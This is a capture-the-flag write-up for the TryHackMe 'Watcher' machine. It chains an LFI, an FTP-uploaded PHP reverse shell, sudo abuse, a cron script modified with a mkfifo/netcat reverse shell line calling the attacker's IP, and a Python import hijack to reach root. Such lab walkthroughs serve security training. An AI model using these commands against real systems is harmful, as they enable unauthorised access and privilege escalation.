# CTF TryHackMe - Watcher

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.172.36
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-18 10:28 CEST
Nmap scan report for 10.10.172.36
Host is up (0.081s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-title: Corkplacemats
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.89 seconds
```

## Check robots.txt

Checks http://10.10.172.36/robots.txt

```
User-agent: *
Allow: /flag_1.txt
Allow: /secret_file_do_not_read.txt
```

## LFI

Found an LFI

```
http://10.10.196.242/post.php?post=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin will:x:1000:1000:will:/home/will:/bin/bash ftp:x:111:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin ftpuser:x:1001:1001:,,,:/home/ftpuser:/usr/sbin/nologin mat:x:1002:1002:,#,,:/home/mat:/bin/bash toby:x:1003:1003:,,,:/home/toby:/bin/bash
```

Now let's see if we can read the secret_file_do_not_read

```
http://10.10.196.242/post.php?post=/var/www/html/secret_file_do_not_read.txt

Hi Mat,

The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.

Will

----------

ftpuser:givemefiles777
```

Yeeeah !

Now we need to LFI to RCE

## LFI to RCE

First check if we can upload file by the ftp

```bash
ftp> cd files
250 Directory successfully changed.
ftp> put toto.txt
local: toto.txt remote: toto.txt
229 Entering Extended Passive Mode (|||45498|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************************|     5       65.98 KiB/s    00:00 ETA
226 Transfer complete.
5 bytes sent in 00:00 (0.04 KiB/s)
```

Yes we can. And we can also read it with this URL : http://10.10.204.175/post.php?post=/home/ftpuser/ftp/files/toto.txt

Let's upload a php reverse shell

```bash
ftp> cd files
250 Directory successfully changed.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||46940|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************************|  5493       25.93 MiB/s    00:00 ETA
226 Transfer complete.
5493 bytes sent in 00:00 (24.29 KiB/s)
```

Call this URL : http://10.10.204.175/post.php?post=/home/ftpuser/ftp/files/php-reverse-shell.php

And we are in 

```bash
nc -lvnp 1234                       
listening on [any] 1234 ...                           
connect to [10.9.188.66] from (UNKNOWN) [10.10.204.175] 50856
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:52:36 up 31 min,  0 users,  load average: 0.00, 0.00, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Try to privesc to a user

I listed our sudo permissions

```bash
www-data@watcher:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL
```

Yeah we can execute any commands as toby. So i deployed an ssh key to get ssh access

```bash
www-data@watcher:/$ sudo -u toby mkdir -p /home/toby/.ssh

www-data@watcher:/tmp$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOk2cJdK02I2+DV/++LMq60i5DxDOonIkhpGVm73BzW+hrdjyme6p9gdr/1TH8uS9odkBSG2G3WRjovXLqH8sC4bwFBFxnqDlm+TDmFpHgD5sV7tMEJTcBvVKkA6hmuRNoyQiX5IWqXpZsgfMMN4c7oDZzczYf4GmyWxv+8HcHAPVXSkZMjrYXxE1Ri9AVm+i1M4rc0XRWKUd1ZuHFV4JL5N6Jjs5UuYcrQbvQ8JwK1geW1/y4Q7TMFE3S+HeG5ShJ2ehaJrHW6F9WkLrZySxGSfzW3aV1wg2Rjmz51l1kRkT7wvMYLUgs3KsKQU90OGtKRQeLrcXjC+jjuffvfiUg2JkPck3d/uxuC6hxyyFPbMSDJrcRslA7Buw3Y4mxc6nyazTQjQh7cdobInPvwGyFPVXf5KlA8BplFXKcNcxmVcSLCepvWxP0N5D1il7HQUSE6qwt7t8lJqbsadsz0wbMiFqwoNIf3MC/2hSnrjBhT5xDcoyH7VGTDnAMCoDgtQU=" > authorized_keys

www-data@watcher:/tmp$ sudo -u toby cp authorized_keys /home/toby/.ssh
```
Let's open an ssh session

```bash
ssh -i toby.key toby@10.10.204.175
toby@watcher:~$ id
uid=1003(toby) gid=1003(toby) groups=1003(toby)
```

Yes, we have an ssh access as toby now !

## PrivEsc to another user

In the toby's home i saw a note

```bash
$ cat note.txt
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat
```

I listed the crontabs

```bash
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/1 * * * * mat /home/toby/jobs/cow.sh
```

Let's check what's inside cow.sh

```bash
$ ls -la jobs
total 12
drwxrwxr-x 2 toby toby 4096 Dec  3  2020 .
drwxr-xr-x 6 toby toby 4096 Dec 12  2020 ..
-rwxr-xr-x 1 toby toby   46 Dec  3  2020 cow.sh
$ cat jobs/cow.sh
#!/bin/bash
cp /home/mat/cow.jpg /tmp/cow.jpg
```

I modified the script to get a reverse shell

```bash
toby@watcher:~$ cat jobs/cow.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.188.66 9001 >/tmp/f
cp /home/mat/cow.jpg /tmp/cow.jpg
```

Start an netcat listener

```bash
nc -lvnp 9001                                  
listening on [any] 9001 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.204.175] 38640
sh: 0: can't access tty; job control turned off
$ id
uid=1002(mat) gid=1002(mat) groups=1002(mat)
```

We are mat now!

## Privesc to another user (again)

Listed the mat's sudo permissions

```bash
mat@watcher:~$ sudo -l
sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *
```

let's inspect the python script located at /home/mat/scripts/will_script.py

```bash
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)
```

Now inspect cmd.py

```bash
cat /home/mat/scripts/cmd.py
def get_command(num):                                                                                                
        if(num == "1"):                                                                                              
                return "ls -lah"                                                                                     
        if(num == "2"):                                                                                              
                return "id"                                                                                          
        if(num == "3"):                                                                                              
                return "cat /etc/passwd"
```

We can read and write this file. Go change his content to get a shell as will

* import os to execute command
* replace id by our os.system command

```
import os

def get_command(num):
  if(num == "1"):
    return "ls -lah"
  if(num == "2"):
    os.system("/bin/bash")
  if(num == "3"):
    return "cat /etc/passwd"
```

Then execute :

```bash
mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 2
will@watcher:~/scripts$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
```

We are Will now!

## PrivEsc to Root

I saw this folder, base64 encoded. So decoded this one. I got an ssh private key

```
/opt/backups/key.b64
```

Then use that key to connect over ssh as root !
